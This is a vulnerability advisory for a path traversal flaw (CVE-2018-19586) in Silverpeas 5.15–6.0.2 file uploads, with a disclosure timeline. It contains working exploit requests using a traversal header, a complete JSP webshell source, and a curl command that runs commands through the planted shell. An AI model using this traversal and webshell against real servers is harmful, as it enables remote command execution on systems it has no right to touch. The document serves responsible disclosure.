Product Description

From the vendor’s website:

“Silverpeas is an open source WEB platform that improves the collaboration between the actors of a company or organization.” Silverpeas is widely used by many notable French organizations including those in the media, retail, and government space.

Vulnerabilities List

One vulnerability was identified within the Silverpeas 5.15 to 6.0.2 application.

Affected Versions

5.15 to 6.0.2

Solution

If you are using the affected versions of the Silverpeas software, please ensure you have the following mitigations installed:

Path Traversal

Silverpeas 5.15 to 6.0.2 is affected by an authenticated path traversal vulnerability that can be triggered during file uploads. This vulnerability enables regular users to write arbitrary files on the underlying system with the privileges of the user running the application. An attacker may leverage the vulnerability to write an executable JSP file in an exposed web directory and execute commands on the underlying system.

Vulnerability Details

CVE ID: CVE-2018-19586

Access Vector: Remote

Security Risk: Critical

Vulnerability: CWE-23

CVSS Base Score: 9.9

CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

The path traversal vulnerability is located in an upload mechanism that is reachable across several other features (e.g., forum, ideas) with regular user privileges. The application takes the upload path from the HTTP header without proper sanitization:

POST /silverpeas/services/fileUpload HTTP/1.1

Host: vulns.lan:8000

…omitted for brevity…

Content-Type: application/octet-stream

X-FULL-PATH: ../../../../../../../tmp/test.png

FILE CONTENTS

The file is then created in /tmp:

root@vulns:/tmp# ls -lah | grep -i test

-rw-r--r-- 1 root root 201 nov. 16 02:53 test.png

By default, files are uploaded to $SILVERPEAS_HOME/data/temp/[UUID]/, which is outside the application’s main directory. Through the use of the Silverpeas official installer, the core package (containing main Java classes and JSP files) is deployed in a virtual file system (VFS) whose path is randomized and not writable. However, the installer ships another web application resource (WAR) that is reachable under /weblib/ and whose path is not randomized.

The request below can be used to deploy a malicious JSP file

POST /silverpeas/services/fileUpload HTTP/1.1

Host: vulns.lan:8000

…omitted for brevity…

Content-Type: application/octet-stream

X-FULL-PATH: ../../web/weblib.war/Aurora/css/webshell.jsp

…omitted for brevity…

<%@ page import="java.io.*" %>

<%

String cmd = request.getParameter("cmd");

String output = "";

if(cmd != null) {

String s = null;

try {

Process p = Runtime.getRuntime().exec(cmd,null,null);

BufferedReader sI = new BufferedReader(new

InputStreamReader(p.getInputStream()));

while((s = sI.readLine()) != null) { output += s+"

"; }

} catch(IOException e) { e.printStackTrace(); }

}

%>

<%=output %>

Command execution can then be achieved by using the deployed file, highlighted below:

$ curl 'http://vulns.lan:8000/weblib/Aurora/css/webshell.jsp?cmd=ls'

appclient

bin

copyright.txt

docs

domain

jboss-modules.jar

LICENSE.txt

modules

README.txt

standalone

welcome-content

The issue is due to a lack of user-input sanitization in the FileUploadData Java class. For more information, see:

Disclosure Timeline:

11/10/2018: Initial discovery for version 6.0.2

11/26/2018: Initial notification of product vendor

12/01/2018: Versions 5.15 to 6.0.2 discovered to be affected

12/14/2018: Patches released for 5.15 and 6.0

Researcher:

Bastien Faure , Security Associate at Bishop Fox